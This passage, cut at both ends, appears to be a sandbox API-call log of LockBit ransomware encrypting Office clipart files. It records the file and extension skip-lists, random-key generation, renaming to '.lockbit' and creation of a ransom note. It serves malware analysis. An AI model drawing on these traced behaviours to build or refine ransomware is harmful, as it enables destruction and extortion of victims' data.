lpString2=".WMF") returned -1 [0177.302] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02793_.WMF") returned -1 [0177.303] lstrcmpiW (lpString1="ntldr", lpString2="SO02793_.WMF") returned -1 [0177.303] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02793_.WMF") returned -1 [0177.303] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02793_.WMF") returned -1 [0177.303] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02793_.WMF") returned -1 [0177.303] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02793_.WMF") returned 1 [0177.303] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02793_.WMF") returned -1 [0177.303] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.303] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF") returned=".WMF" [0177.303] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.303] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.303] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.304] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.304] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF.lockbit") returned 72 [0177.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02793_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0177.309] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.309] malloc (_Size=0x40068) returned 0x3ef0008 [0177.309] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=23408) returned 1 [0177.309] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0177.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0177.310] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0177.314] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.314] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.314] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.315] free (_Block=0x1fa2ed8) [0177.316] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.316] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.316] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02794_.WMF", cAlternateFileName="")) returned 1 [0177.316] lstrcmpiW (lpString1=".", lpString2="SO02794_.WMF") returned -1 [0177.316] lstrcmpiW (lpString1="..", lpString2="SO02794_.WMF") returned -1 [0177.316] PathFindExtensionW (pszPath="SO02794_.WMF") returned=".WMF" [0177.316] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.316] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.317] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.317] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02794_.WMF") returned -1 [0177.318] lstrcmpiW (lpString1="ntldr", lpString2="SO02794_.WMF") returned -1 [0177.318] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02794_.WMF") returned -1 [0177.318] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02794_.WMF") returned -1 [0177.318] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02794_.WMF") returned -1 [0177.318] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02794_.WMF") returned 1 [0177.318] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02794_.WMF") returned -1 [0177.318] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.318] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF") returned=".WMF" [0177.318] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.318] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.318] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.319] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.319] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF.lockbit") returned 72 [0177.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02794_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0177.325] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.325] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.325] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19322) returned 1 [0177.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.326] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.329] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.329] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.330] free (_Block=0x1fa2ed8) [0177.330] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.330] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.330] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.331] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d37e7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1262e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02862_.WMF", cAlternateFileName="")) returned 1 [0177.331] lstrcmpiW (lpString1=".", lpString2="SO02862_.WMF") returned -1 [0177.331] lstrcmpiW (lpString1="..", lpString2="SO02862_.WMF") returned -1 [0177.331] PathFindExtensionW (pszPath="SO02862_.WMF") returned=".WMF" [0177.331] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.331] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.332] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.332] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02862_.WMF") returned -1 [0177.333] lstrcmpiW (lpString1="ntldr", lpString2="SO02862_.WMF") returned -1 [0177.333] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02862_.WMF") returned -1 [0177.333] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02862_.WMF") returned -1 [0177.333] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02862_.WMF") returned -1 [0177.333] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02862_.WMF") returned 1 [0177.333] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02862_.WMF") returned -1 [0177.333] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.333] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF") returned=".WMF" [0177.333] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.333] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.333] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.334] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.334] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF.lockbit") returned 72 [0177.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02862_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.335] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.336] malloc (_Size=0x40068) returned 0x3d70450 [0177.336] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=75310) returned 1 [0177.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.337] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.341] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.341] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.342] free (_Block=0x1fa2ed8) [0177.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft 